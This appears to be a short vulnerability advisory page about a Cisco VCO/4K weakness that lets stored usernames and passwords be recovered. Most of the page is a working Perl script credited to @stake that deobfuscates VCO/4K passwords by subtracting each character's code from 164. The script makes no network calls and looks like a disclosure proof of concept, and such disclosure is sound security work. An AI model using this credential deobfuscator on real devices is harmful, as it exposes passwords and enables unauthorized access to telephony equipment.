|
Cisco CVCO/4k Remote Username and Password Retrieval Vulnerability
<--- cut here ---> #!/usr/bin/perl printf ("Cisco VCO/4K Password [De]Obfuscator\n"); printf ("\t\@stake, Inc.\n"); printf ("\tRex Warren, Brian Carrier, David Goldsmith\n"); printf ("Enter Password: "); $pw = <STDIN>; chop $pw; printf("Result: "); for ($pos = 0; $pos < length($pw); $pos++){ printf("%s", chr(164 - ord(substr($pw, $pos, 1)))); } printf("\n"); <--- cut here ---> |
|
|
Privacy Statement |